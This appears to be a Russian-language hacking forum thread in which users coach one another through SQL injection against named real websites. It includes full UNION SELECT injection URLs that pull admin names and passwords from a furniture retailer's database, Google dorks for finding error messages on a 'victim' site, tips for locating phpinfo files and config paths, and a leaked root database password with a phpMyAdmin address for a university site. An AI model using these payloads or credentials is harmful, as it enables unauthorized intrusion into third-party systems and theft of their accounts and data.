masternet, можешь поискать ошибки на сайте, обычно в них можно найти. А так сканером вполне вероятно узнать...
если ты про тот же сайт, про который меня вчера в ЛС долбил, то просто удали из запроса например номер последней колонки - будет ошибка и покажет полный путь
Если только File_priv Y ....(то есть можешь прочитать допустим /etc/passwd) ...Найти конфиги апача..... Ну или из ошибок(если там конечно будет показан полный путь..)
Часто бывает, что в корне сайта валяется пхпинфо с именем типа phpinfo.php, info.php, test.php и т.д.
можно через гугль ошибки поискать... site:jertva.com Warning если гугл ошибок не помнит, то идем на Code: madnet.name/tools/madss/ вбиваем имя сайта и смотрим, хостятся ли рядом какие-либо сайты... если да, то поочерёдно вбиваем в гугль site:sait_ryadom_s_jertvoi.com Warning P.S кроме Warning, можно и по другим кеям поискать, Error, "failed to open stream"...
Code: http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+column_name+from+information_schema.columns+where+table_name=0x61736d5f61646d696e+limit+2,1-- почему сам учётки не высвечиваются?
Ну наверное чтобы узнать учётки надо вот такой запрос сделать Code: http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+concat_ws(0x40,name,password)+from+asm_admin+limit+0,1-- А то что ты выше написал-этим мы всего лишь узнаем какие колонки в таблице asm_admin
Далеко не факт, просто вероятно пароль не хранится в бд... А находиться он может где угодно. Я встречал, даже когда авторизация с данными для входа была вшита в сам скрипт(запароленый), к которому мы обращаемся
phpMyAdmin редиректит Есть сайт bridge.tane.edu.ua, есть пароль на рута Code: $DATABASENAME = "stud_test"; $DATABASESERVER = "localhost"; $DATABASEUSER = "root"; $DATABASEPASS = "steppenW"; Есть майадмин: bridge.tane.edu.ua/phpmyadmin/ Сервер запущен на 192.168.101.18, и постоянно туда редиректит, если заходить через майадмин. Как нормально поюзать багу?
Подскажите, каким образом можно просмотреть имена таблиц и колонок при SQL-инъекции другой базы данных, находящейся на этом же аккаунте?
Thrasher88 column_name+from+information_schema.columns+where+table_schema='база'+and+table_name='таблица'
Goudini Да всё нормально юзается. Заходит в майадмин с этими данными норм, как root@sectorgaza =) Что конкретно тебе нужно?
Всем доброго времени суток! Я тут недавно начал изучать SQL inj . читал статьи и.т.д 1)Нашел уязвимость подставив кавычку (выдалась ошибка ) Code: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''100''' at line 6 2)Начал искать кол-во полей подобрал вручную около 50 (потом устал ), но на 20 аргументе у меня выдалось не то что всегдда выдавалось (от 1 до 19 и от 21 до 50),я решил что строк 20.... 3)Решил подставить VERSION() USER()..итд получил ответы: DB: tmhoxc76 Usr: tmhoxc76@*ipsite* Ver: 4.1.22-max-log вобщем вопросик: даж не знаю как сказать.... вобщем все запросы котрые я делал отображались не в теле сайта,а шли вместо замены ссылки,но выводились правильно как я понял.... так вот как мне тееперь извлечь данные из таблицы? ПыСы: ссорь hack.lang=2